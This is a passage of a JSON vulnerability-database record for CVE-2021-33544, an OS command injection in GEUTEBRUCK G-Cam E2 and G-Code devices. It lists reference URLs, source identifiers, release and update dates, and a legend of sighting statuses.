      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "http://geutebruck.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
      }
    ],
    "sources": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33544"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      },
      {
        "db": "PACKETSTORM",
        "id": "164036"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202107-2093"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33544"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33544"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      },
      {
        "db": "PACKETSTORM",
        "id": "164036"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202107-2093"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33544"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-07-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      },
      {
        "date": "2021-09-02T15:36:40",
        "db": "PACKETSTORM",
        "id": "164036"
      },
      {
        "date": "2021-07-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202107-2093"
      },
      {
        "date": "2021-04-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "date": "2021-09-13T18:15:21.130000",
        "db": "NVD",
        "id": "CVE-2021-33544"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-07-29T08:30:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      },
      {
        "date": "2022-10-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202107-2093"
      },
      {
        "date": "2021-04-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "date": "2023-11-07T03:35:51.497000",
        "db": "NVD",
        "id": "CVE-2021-33544"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "164036"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202107-2093"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple vulnerabilities in G-Cam E2 and G-Code made by GEUTEBRUCK",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system command injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202107-2093"
      }
    ],
    "trust": 0.6
  }
}



Sightings


Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

